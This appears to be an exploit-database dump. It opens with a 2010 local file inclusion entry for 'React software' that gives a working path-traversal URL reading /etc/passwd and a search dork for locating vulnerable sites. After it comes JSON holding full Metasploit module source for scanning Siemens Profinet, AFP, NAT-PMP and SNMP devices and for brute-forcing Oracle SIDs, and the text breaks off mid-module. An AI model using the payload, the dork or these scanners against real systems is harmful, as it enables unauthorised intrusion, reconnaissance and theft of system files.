ID 1337DAY-ID-11514
Type zdt
Reporter SNK
Modified 2010-03-30T00:00:00
Description
Exploit for php platform in category web applications
=================================================
React software local file inclusion Vulnerability
=================================================
React software [local file inclusion]
- date: 29.03.2010
- author: SNK
- language: php
- page: http://react.nl
- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00
- dork: Powered by React - www.react.nl
# 0day.today [2018-02-27] #
{"published": "2010-03-30T00:00:00", "id": "1337DAY-ID-11514", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T02:26:49", "bulletin": {"published": "2010-03-30T00:00:00", "id": "1337DAY-ID-11514", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.6, "modified": "2016-04-19T02:26:49"}}, "hash": "8fc12c1b1889dd337d78d58046e93158878a09a1fe1ebc93b9462a3edad8b119", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T02:26:49", "edition": 1, "title": "React software local file inclusion Vulnerability", "href": "http://0day.today/exploit/description/11514", "modified": "2010-03-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/11514", "references": [], "reporter": "SNK", "sourceData": "=================================================\r\nReact software local file inclusion Vulnerability\r\n=================================================\r\n\r\nReact software [local file inclusion]\r\n \r\n- date: 29.03.2010\r\n \r\n- author: SNK\r\n- language: php\r\n- page: http://react.nl\r\n- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00\r\n- dork: Powered by React - www.react.nl\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "04c78c4d1282ac0ac43e8bed558f7313", "key": "sourceData"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "bbe65366bfd6d96ebacd1b3d59662a12", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0803d5d168c716e71a3f12fee71d0c7e", "key": "href"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "published"}, {"hash": "214f59e4092db334832c6fc343a26bd9", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "888c810137fa148866cb9a08cbcb66c0", "key": "reporter"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "9d7846ef88f385c960c6fed81338543d86c91c9b4fd350518e57d2db987b91df", "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-02-28T01:35:08"}, "vulnersScore": 2.1}, "type": "zdt", "lastseen": "2018-02-28T01:35:08", "edition": 2, "title": "React software local file inclusion Vulnerability", "href": "https://0day.today/exploit/description/11514", "modified": "2010-03-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "https://0day.today/exploit/11514", "references": [], "reporter": "SNK", "sourceData": "=================================================\r\nReact software local file inclusion Vulnerability\r\n=================================================\r\n\r\nReact software [local file inclusion]\r\n \r\n- date: 29.03.2010\r\n \r\n- author: SNK\r\n- language: php\r\n- page: http://react.nl\r\n- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00\r\n- dork: Powered by React - www.react.nl\r\n\r\n\n\n# 0day.today [2018-02-27] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "1071d166ab53f7bc9350db948fc8b392", "key": "href"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "modified"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "888c810137fa148866cb9a08cbcb66c0", "key": "reporter"}, {"hash": "c75f7910abb7bd0230d461e3c354f628", "key": "sourceData"}, {"hash": "3772f0e5824247cd17aed7453963e45a", "key": "sourceHref"}, {"hash": "bbe65366bfd6d96ebacd1b3d59662a12", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-04-25T17:23:00", "bulletinFamily": "exploit", "description": "This module will use Layer2 packets, known as Profinet Discovery packets, to detect all Siemens (and sometimes other) devices on a network. It is perfectly SCADA-safe, as there will only be ONE single packet sent out. Devices will respond with their IP configuration and hostnames. Created by XiaK Industrial Security Research Center (www[dot]xiak[dot]be))", "modified": "2017-07-24T13:26:21", "published": "2016-09-11T07:15:41", "id": "MSF:AUXILIARY/SCANNER/SCADA/PROFINET_SIEMENS", "href": "", "type": "metasploit", "title": "Siemens Profinet Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'packetfu'\n\nclass MetasploitModule < Msf::Auxiliary\n def initialize\n super(\n 'Name' => 'Siemens Profinet Scanner',\n 'Description' => %q{\n This module will use Layer2 packets, known as Profinet Discovery packets,\n to detect all Siemens (and sometimes other) devices on a network.\n It is perfectly SCADA-safe, as there will only be ONE single packet sent out.\n Devices will respond with their IP configuration and hostnames.\n Created by XiaK Industrial Security Research Center (www[dot]xiak[dot]be))\n },\n 'References' =>\n [\n [ 'URL', 'https://wiki.wireshark.org/PROFINET/DCP' ],\n [ 'URL', 'https://github.com/tijldeneut/ICSSecurityScripts' ]\n ],\n 'Author' => 'Tijl Deneut <tijl.deneut[at]howest.be>',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('INTERFACE', [ true, 'Set an interface', 'eth0' ]),\n OptInt.new('ANSWERTIME', [ true, 'Seconds to wait for answers, set longer on slower networks', 2 ])\n ], self.class\n )\n end\n\n def hex_to_bin(s)\n s.scan(/../).map { |x| x.hex.chr }.join\n end\n\n def bin_to_hex(s)\n s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n end\n\n def hexint_to_str(s)\n s.to_i(16).to_s\n end\n\n def hex_to_address(s)\n hexint_to_str(s[0..1]) + '.' + hexint_to_str(s[2..3]) + '.' + hexint_to_str(s[4..5]) + '.' + hexint_to_str(s[6..7])\n end\n\n def parse_devicerole(role)\n arr = { \"01\" => \"IO-Device\", \"02\" => \"IO-Controller\", \"04\" => \"IO-Multidevice\", \"08\" => \"PN-Supervisor\" }\n return arr[role] unless arr[role].nil?\n 'Unknown'\n end\n\n def parse_vendorid(id)\n return 'Siemens' if id == '002a'\n 'Unknown'\n end\n\n def parse_deviceid(id)\n arr = { \"0a01\" => \"Switch\", \"0202\" => \"PC Simulator\", \"0203\" => \"S7-300 CPU\", \\\n \"0101\" => \"S7-300\", \"010e\" => \"S7-1500\", \"010d\" => \"S7-1200\", \"0301\" => \"HMI\", \\\n \"0403\" => \"HMI\", \"010b\" => \"ET200S\" }\n return arr[id] unless arr[id].nil?\n 'Unknown'\n end\n\n def parse_block(block, block_length)\n block_id = block[0..2 * 2 - 1]\n case block_id\n when '0201'\n type_of_station = hex_to_bin(block[4 * 2..4 * 2 + block_length * 2 - 1])\n print_line(\"Type of station: #{type_of_station}\")\n when '0202'\n name_of_station = hex_to_bin(block[4 * 2..4 * 2 + block_length * 2 - 1])\n print_line(\"Name of station: #{name_of_station}\")\n when '0203'\n vendor_id = parse_vendorid(block[6 * 2..8 * 2 - 1])\n device_id = parse_deviceid(block[8 * 2..10 * 2 - 1])\n print_line(\"Vendor and Device Type: #{vendor_id}, #{device_id}\")\n when '0204'\n device_role = parse_devicerole(block[6 * 2..7 * 2 - 1])\n print_line(\"Device Role: #{device_role}\")\n when '0102'\n ip = hex_to_address(block[6 * 2..10 * 2 - 1])\n snm = hex_to_address(block[10 * 2..14 * 2 - 1])\n gw = hex_to_address(block[14 * 2..18 * 2 - 1])\n print_line(\"IP, Subnetmask and Gateway are: #{ip}, #{snm}, #{gw}\")\n end\n end\n\n def parse_profinet(data)\n data_to_parse = data[24..-1]\n\n until data_to_parse.empty?\n block_length = data_to_parse[2 * 2..4 * 2 - 1].to_i(16)\n block = data_to_parse[0..(4 + block_length) * 2 - 1]\n\n parse_block(block, block_length)\n\n padding = block_length % 2\n data_to_parse = data_to_parse[(4 + block_length + padding) * 2..-1]\n end\n end\n\n def receive(iface, answertime)\n capture = PacketFu::Capture.new(iface: iface, start: true, filter: 'ether proto 0x8892')\n sleep answertime\n capture.save\n i = 0\n capture.array.each do |packet|\n data = bin_to_hex(packet).downcase\n mac = data[12..13] + ':' + data[14..15] + ':' + data[16..17] + ':' + data[18..19] + ':' + data[20..21] + ':' + data[22..23]\n next unless data[28..31] == 'feff'\n print_good(\"Parsing packet from #{mac}\")\n parse_profinet(data[28..-1])\n print_line('')\n i += 1\n end\n if i.zero?\n print_warning('No devices found, maybe you are running virtually?')\n else\n print_good(\"I found #{i} devices for you!\")\n end\n end\n\n def run\n iface = datastore['INTERFACE']\n answertime = datastore['ANSWERTIME']\n packet = \"\\x00\\x00\\x88\\x92\\xfe\\xfe\\x05\\x00\\x04\\x00\\x00\\x03\\x00\\x80\\x00\\x04\\xff\\xff\\x00\\x00\\x00\\x00\"\n packet += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n eth_pkt = PacketFu::EthPacket.new\n begin\n eth_pkt.eth_src = PacketFu::Utils.whoami?(iface: iface)[:eth_src]\n rescue\n print_error(\"Error: interface #{iface} not active?\")\n return\n end\n eth_pkt.eth_daddr = \"01:0e:cf:00:00:00\"\n eth_pkt.eth_proto = 0x8100\n eth_pkt.payload = packet\n print_status(\"Sending packet out to #{iface}\")\n eth_pkt.to_w(iface)\n\n receive(iface, answertime)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/scada/profinet_siemens.rb"}, {"lastseen": "2019-04-28T02:51:46", "bulletinFamily": "exploit", "description": "This module fetches AFP server information, including server name, network address, supported AFP versions, signature, machine type, and server flags.", "modified": "2019-03-05T09:38:51", "published": "2012-03-02T19:58:40", "id": "MSF:AUXILIARY/SCANNER/AFP/AFP_SERVER_INFO", "href": "", "type": "metasploit", "title": "Apple Filing Protocol Info Enumerator", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::AFP\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Apple Filing Protocol Info Enumerator',\n 'Description' => %q{\n This module fetches AFP server information, including server name,\n network address, supported AFP versions, signature, machine type,\n and server flags.\n },\n 'References' =>\n [\n [ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]\n ],\n 'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],\n 'License' => MSF_LICENSE\n ))\n end\n\n def run_host(ip)\n print_status(\"AFP #{ip} Scanning...\")\n begin\n connect\n response = get_info\n report(response)\n rescue ::Timeout::Error\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET, ::Errno::ENOPROTOOPT\n rescue ::Exception\n raise $!\n print_error(\"AFP #{rhost}:#{rport} #{$!.class} #{$!}\")\n ensure\n disconnect\n end\n end\n\n def report(response)\n report_info = \"AFP #{rhost}:#{rport} Server Name: #{response[:server_name]} \\n\" +\n \"AFP #{rhost}:#{rport} Server Flags: \\n\" +\n format_flags_report(response[:server_flags]) +\n \"AFP #{rhost}:#{rport} Machine Type: #{response[:machine_type]} \\n\" +\n \"AFP #{rhost}:#{rport} AFP Versions: #{response[:versions].join(', ')} \\n\" +\n \"AFP #{rhost}:#{rport} UAMs: #{response[:uams].join(', ')}\\n\" +\n \"AFP #{rhost}:#{rport} Server Signature: #{response[:signature]}\\n\" +\n \"AFP #{rhost}:#{rport} Server Network Address: \\n\" +\n format_addresses_report(response[:network_addresses]) +\n \"AFP #{rhost}:#{rport} UTF8 Server Name: #{response[:utf8_server_name]}\"\n\n\n lines = \"AFP #{rhost}:#{rport}:#{rport} AFP:\\n#{report_info}\"\n\n lines.split(/\\n/).each do |line|\n print_status(line)\n end\n\n report_note(:host => datastore['RHOST'],\n :proto => 'tcp',\n :port => datastore['RPORT'],\n :type => 'afp_server_info',\n :data => response)\n\n report_service(\n :host => datastore['RHOST'],\n :port => datastore['RPORT'],\n :proto => 'tcp',\n :name => \"afp\",\n :info => \"AFP name: #{response[:utf8_server_name]}, Versions: #{response[:versions].join(', ')}\"\n )\n\n end\n\n def format_flags_report(parsed_flags)\n report = ''\n parsed_flags.each do |flag, val|\n report << \"AFP #{rhost}:#{rport} * #{flag}: #{val.to_s} \\n\"\n end\n return report\n end\n\n def format_addresses_report(parsed_network_addresses)\n report = ''\n parsed_network_addresses.each do |val|\n report << \"AFP #{rhost}:#{rport} * #{val.to_s} \\n\"\n end\n return report\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/afp/afp_server_info.rb"}, {"lastseen": "2019-04-28T02:51:34", "bulletinFamily": "exploit", "description": "Scan NAT devices for their external listening ports using NAT-PMP", "modified": "2017-07-24T13:26:21", "published": "2012-01-24T16:16:56", "id": "MSF:AUXILIARY/SCANNER/NATPMP/NATPMP_PORTSCAN", "href": "", "type": "metasploit", "title": "NAT-PMP External Port Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::NATPMP\n include Rex::Proto::NATPMP\n\n def initialize\n super(\n 'Name' => 'NAT-PMP External Port Scanner',\n 'Description' => 'Scan NAT devices for their external listening ports using NAT-PMP',\n 'Author' => 'Jon Hart <jhart[at]spoofed.org>',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('PORTS', [true, \"Ports to scan (e.g. 22-25,80,110-900)\", \"1-1000\"])\n ])\n end\n\n def run_host(host)\n begin\n udp_sock = Rex::Socket::Udp.create({\n 'LocalHost' => datastore['CHOST'] || nil,\n 'Context' => {'Msf' => framework, 'MsfExploit' => self} }\n )\n add_socket(udp_sock)\n peer = \"#{host}:#{datastore['RPORT']}\"\n vprint_status(\"#{peer} Scanning #{protocol} ports #{datastore['PORTS']} using NATPMP\")\n\n external_address = get_external_address(udp_sock, host, datastore['RPORT'])\n if (external_address)\n print_good(\"#{peer} responded with external address of #{external_address}\")\n else\n vprint_status(\"#{peer} didn't respond with an external address\")\n return\n end\n\n # clear all mappings\n map_port(udp_sock, host, datastore['RPORT'], 0, 0, Rex::Proto::NATPMP.const_get(protocol), 0)\n\n Rex::Socket.portspec_crack(datastore['PORTS']).each do |port|\n map_req = map_port_request(port, port, Rex::Proto::NATPMP.const_get(datastore['PROTOCOL']), 1)\n udp_sock.sendto(map_req, host, datastore['RPORT'], 0)\n while (r = udp_sock.recvfrom(16, 1.0) and r[1])\n break if handle_reply(host, external_address, r)\n end\n end\n\n rescue ::Interrupt\n raise $!\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused\n nil\n rescue ::Exception => e\n print_error(\"Unknown error: #{e.class} #{e.backtrace}\")\n end\n end\n\n def handle_reply(host, external_addr, pkt)\n return if not pkt[1]\n\n if(pkt[1] =~ /^::ffff:/)\n pkt[1] = pkt[1].sub(/^::ffff:/, '')\n end\n host = pkt[1]\n protocol = datastore['PROTOCOL'].to_s.downcase\n\n (ver, op, result, epoch, int, ext, lifetime) = parse_map_port_response(pkt[0])\n peer = \"#{host}:#{datastore['RPORT']}\"\n if (result == 0)\n # we always ask to map an external port to the same port on us. If\n # we get a successful reponse back but the port we requested be forwarded\n # is different, that means that someone else already has it open\n if (int != ext)\n state = Msf::ServiceState::Open\n print_good(\"#{peer} #{external_addr} - #{int}/#{protocol} #{state} because of successful mapping with unmatched ports\")\n if inside_workspace_boundary?(external_addr)\n report_service(\n :host => external_addr,\n :port => int,\n :proto => protocol,\n :state => state\n )\n end\n else\n state = Msf::ServiceState::Closed\n vprint_error(\"#{peer} #{external_addr} - #{int}/#{protocol} #{state} because of successful mapping with matched ports\")\n end\n else\n state = Msf::ServiceState::Closed\n vprint_error(\"#{peer} #{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response\")\n end\n\n report_service(\n :host \t=> host,\n :port \t=> pkt[2],\n :name \t=> 'natpmp',\n :proto \t=> 'udp',\n :state\t=> Msf::ServiceState::Open\n )\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb"}, {"lastseen": "2019-04-26T14:52:20", "bulletinFamily": "exploit", "description": "This module queries the TNS listener for a valid Oracle database instance name (also known as a SID). Any response other than a \"reject\" will be considered a success. If a specific SID is provided, that SID will be attempted. Otherwise, SIDs read from the named file will be attempted in sequence instead.", "modified": "2019-04-26T13:36:32", "published": "2011-03-09T22:15:15", "id": "MSF:AUXILIARY/SCANNER/ORACLE/SID_BRUTE", "href": "", "type": "metasploit", "title": "Oracle TNS Listener SID Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TNS\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::AuthBrute # Actually, doesn't use much here, but there's a couple handy functions.\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle TNS Listener SID Bruteforce',\n 'Description' => %q{\n This module queries the TNS listener for a valid Oracle database\n instance name (also known as a SID).\n Any response other than a \"reject\" will be considered a success.\n If a specific SID is provided, that SID will be attempted. Otherwise,\n SIDs read from the named file will be attempted in sequence instead.\n },\n 'Author' => [ 'todb' ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptPath.new('SID_FILE', [ false, \"File containing instance names, one per line\", File.join(Msf::Config.data_directory, \"wordlists\", \"sid.txt\") ]),\n OptString.new('SID', [ false, 'A specific SID to attempt.' ]),\n Opt::RPORT(1521)\n ])\n\n deregister_options(\n \"USERNAME\", \"PASSWORD\", \"USER_FILE\", \"PASS_FILE\", \"USERPASS_FILE\",\n \"BLANK_PASSWORDS\", \"USER_AS_PASS\", \"REMOVE_USER_FILE\", \"REMOVE_PASS_FILE\",\n \"REMOVE_USERPASS_FILE\"\n )\n end\n\n def build_sid_request(sid,ip)\n connect_data = \"(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{ip})(PORT=#{rport})))\"\n pkt = tns_packet(connect_data)\n end\n\n def hostport\n [target_host,rport].join(\":\")\n end\n\n def check_sid(sid,ip)\n pkt = build_sid_request(sid,ip)\n sock.put(pkt)\n data = sock.get_once || ''\n parse_response(data)\n end\n\n def parse_response(data)\n return unless data\n len,sum,type,r,hsum,rest = data.unpack(\"nnCCnA*\")\n type # 2 is \"accept\", 11 is resend. Usually you get 11, then 2. 4 is refuse.\n end\n\n def do_sid_check(sid,ip)\n begin\n connect\n response_code = check_sid(sid,ip)\n if response_code.nil?\n print_status \"#{hostport} Oracle - No response given, something is wrong.\"\n return :abort\n elsif response_code != 4\n print_good \"#{hostport} Oracle - '#{sid}' is valid\"\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'oracle',\n :type => \"oracle.sid\",\n :data => sid,\n :update => :unique_data\n )\n return :success\n else\n vprint_status \"#{hostport} Oracle - Refused '#{sid}'\"\n return :fail\n end\n rescue ::Rex::ConnectionError, ::Errno::EPIPE\n print_error(\"#{hostport} Oracle - unable to connect to a TNS listener\")\n return :abort\n ensure\n disconnect\n end\n end\n\n # Based vaguely on each_user_pass in AuthBrute\n def each_sid(&block)\n @@oracle_sid_fail = []\n @@oracle_sid_success = []\n if datastore['SID'].nil? || datastore['SID'].empty?\n sids = extract_words(datastore['SID_FILE']).map {|s| s.to_s.strip.upcase}.uniq\n else\n sids = [datastore['SID'].to_s.strip.upcase]\n end\n print_status \"Checking #{sids.size} SID#{sids.size != 1 && \"s\"} against #{hostport}\"\n sids.each do |s|\n userpass_sleep_interval unless (@@oracle_sid_fail | @@oracle_sid_success).empty?\n next if @@oracle_sid_fail.include?(s) || @@oracle_sid_success.include?(s)\n ret = block.call(s)\n case ret\n when :abort\n break\n when :success\n @@oracle_sid_success << s\n break if datastore[\"STOP_ON_SUCCESS\"]\n when :fail\n @@oracle_sid_fail << s\n end\n end\n end\n\n def run_host(ip)\n each_sid do |sid|\n vprint_status \"#{hostport} Oracle - Checking '#{sid}'...\"\n do_sid_check(sid,ip)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/oracle/sid_brute.rb"}, {"lastseen": "2019-04-25T17:20:53", "bulletinFamily": "exploit", "description": "This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is \"public\".", "modified": "2017-07-24T13:26:21", "published": "2010-12-25T06:31:38", "id": "MSF:AUXILIARY/SCANNER/SNMP/SNMP_ENUM", "href": "", "type": "metasploit", "title": "SNMP Enumeration Module", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SNMP Enumeration Module',\n 'Description' => 'This module allows enumeration of any devices with SNMP\n protocol support. It supports hardware, software, and network information.\n The default community used is \"public\".',\n 'References' =>\n [\n [ 'URL', 'http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol' ],\n [ 'URL', 'http://net-snmp.sourceforge.net/docs/man/snmpwalk.html' ],\n [ 'URL', 'http://www.nothink.org/perl/snmpcheck/' ],\n ],\n 'Author' => 'Matteo Cantoni <goony[at]nothink.org>',\n 'License' => MSF_LICENSE\n ))\n end\n\n def run_host(ip)\n\n begin\n snmp = connect_snmp\n\n fields_order = [\n \"Host IP\", \"Hostname\", \"Description\", \"Contact\",\n \"Location\", \"Uptime snmp\", \"Uptime system\",\n \"System date\", \"domain\", \"User accounts\",\n \"Network information\", \"Network interfaces\",\n \"Network IP\", \"Routing information\",\n \"TCP connections and listening ports\", \"Listening UDP ports\",\n \"Network services\", \"Share\", \"IIS server information\",\n \"Storage information\", \"File system information\",\n \"Device information\", \"Software components\",\n \"Processes\"\n ]\n\n output_data = {}\n output_data = {\"Host IP\"=>ip}\n\n sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s\n output_data[\"Hostname\"] = sysName.strip\n\n # print connected status after the first query so if there are\n # any timeout or connectivity errors; the code would already\n # have jumped to error handling where the error status is\n # already being displayed.\n print_good(\"#{ip}, Connected.\")\n\n sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s\n sysDesc.gsub!(/^\\s+|\\s+$|\\n+|\\r+/, ' ')\n output_data[\"Description\"] = sysDesc.strip\n\n sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s\n output_data[\"Contact\"] = sysContact.strip\n\n sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s\n output_data[\"Location\"] = sysLocation.strip\n\n sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0').to_s\n output_data[\"Uptime system\"] = sysUpTimeInstance.strip\n\n hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0').to_s\n output_data[\"Uptime snmp\"] = hrSystemUptime.strip\n hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/\n\n year = month = day = hour = minutes = seconds = tenths = 0\n\n systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')\n str = systemDate.to_s\n if (str.empty? or str =~ /Null/ or str =~ /^noSuch/)\n output_data[\"System date\"] = '-'\n else\n\n # RFC 2579 - Textual Conventions for SMIv2\n # http://www.faqs.org/rfcs/rfc2579.html\n\n systemDate = systemDate.unpack('C*')\n\n year = systemDate[0] * 256 + systemDate[1]\n month = systemDate[2] || 0\n day = systemDate[3] || 0\n hour = systemDate[4] || 0\n minutes = systemDate[5] || 0\n seconds = systemDate[6] || 0\n tenths = systemDate[7] || 0\n output_data[\"System date\"] = sprintf(\"%d-%d-%d %02d:%02d:%02d.%d\", year, month, day, hour, minutes, seconds, tenths)\n end\n\n if (sysDesc =~ /Windows/)\n domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0').to_s\n\n output_data[\"Domain\"] = domPrimaryDomain.strip\n\n users = []\n\n snmp.walk([\"1.3.6.1.4.1.77.1.2.25.1.1\",\"1.3.6.1.4.1.77.1.2.25.1\"]) do |user,entry|\n users.push([[user.value]])\n end\n\n if not users.empty?\n output_data[\"User accounts\"] = users\n end\n end\n\n network_information = {}\n\n ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')\n\n if ipForwarding == 0 || ipForwarding == 2\n ipForwarding = \"no\"\n network_information[\"IP forwarding enabled\"] = ipForwarding\n elsif ipForwarding == 1\n ipForwarding = \"yes\"\n network_information[\"IP forwarding enabled\"] = ipForwarding\n end\n\n ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')\n if ipDefaultTTL.to_s !~ /Null/\n network_information[\"Default TTL\"] = ipDefaultTTL\n end\n\n tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')\n if tcpInSegs.to_s !~ /Null/\n network_information[\"TCP segments received\"] = tcpInSegs\n end\n\n tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')\n if tcpOutSegs.to_s !~ /Null/\n network_information[\"TCP segments sent\"] = tcpOutSegs\n end\n\n tcpRetransSegs = snmp.get_value('1.3.6.1.2.1.6.12.0')\n if tcpRetransSegs.to_s !~ /Null/\n network_information[\"TCP segments retrans\"] = tcpRetransSegs\n end\n\n ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')\n if ipInReceives.to_s !~ /Null/\n network_information[\"Input datagrams\"] = ipInReceives\n end\n\n ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')\n if ipInDelivers.to_s !~ /Null/\n network_information[\"Delivered datagrams\"]=ipInDelivers\n end\n\n ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')\n if ipOutRequests.to_s !~ /Null/\n network_information[\"Output datagrams\"]=ipOutRequests\n end\n\n if not network_information.empty?\n output_data[\"Network information\"] = network_information\n end\n\n network_interfaces = []\n\n snmp.walk([\n \"1.3.6.1.2.1.2.2.1.1\", \"1.3.6.1.2.1.2.2.1.2\", \"1.3.6.1.2.1.2.2.1.6\",\n \"1.3.6.1.2.1.2.2.1.3\", \"1.3.6.1.2.1.2.2.1.4\", \"1.3.6.1.2.1.2.2.1.5\",\n \"1.3.6.1.2.1.2.2.1.10\", \"1.3.6.1.2.1.2.2.1.16\", \"1.3.6.1.2.1.2.2.1.7\"\n ]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|\n\n ifindex = index.value\n ifdescr = descr.value\n ifmac = mac.value.unpack(\"H2H2H2H2H2H2\").join(\":\")\n iftype = type.value\n ifmtu = mtu.value\n ifspeed = speed.value.to_i\n ifinoc = inoc.value\n ifoutoc = outoc.value\n ifstatus = status.value\n\n case iftype\n when 1\n iftype = \"other\"\n when 2\n iftype = \"regular1822\"\n when 3\n iftype = \"hdh1822\"\n when 4\n iftype = \"ddn-x25\"\n when 5\n iftype = \"rfc877-x25\"\n when 6\n iftype = \"ethernet-csmacd\"\n when 7\n iftype = \"iso88023-csmacd\"\n when 8\n iftype = \"iso88024-tokenBus\"\n when 9\n iftype = \"iso88025-tokenRing\"\n when 10\n iftype = \"iso88026-man\"\n when 11\n iftype = \"starLan\"\n when 12\n iftype = \"proteon-10Mbit\"\n when 13\n iftype = \"proteon-80Mbit\"\n when 14\n iftype = \"hyperchannel\"\n when 15\n iftype = \"fddi\"\n when 16\n iftype = \"lapb\"\n when 17\n iftype = \"sdlc\"\n when 18\n iftype = \"ds1\"\n when 19\n iftype = \"e1\"\n when 20\n iftype = \"basicISDN\"\n when 21\n iftype = \"primaryISDN\"\n when 22\n iftype = \"propPointToPointSerial\"\n when 23\n iftype = \"ppp\"\n when 24\n iftype = \"softwareLoopback\"\n when 25\n iftype = \"eon\"\n when 26\n iftype = \"ethernet-3Mbit\"\n when 27\n iftype = \"nsip\"\n when 28\n iftype = \"slip\"\n when 29\n iftype = \"ultra\"\n when 30\n iftype = 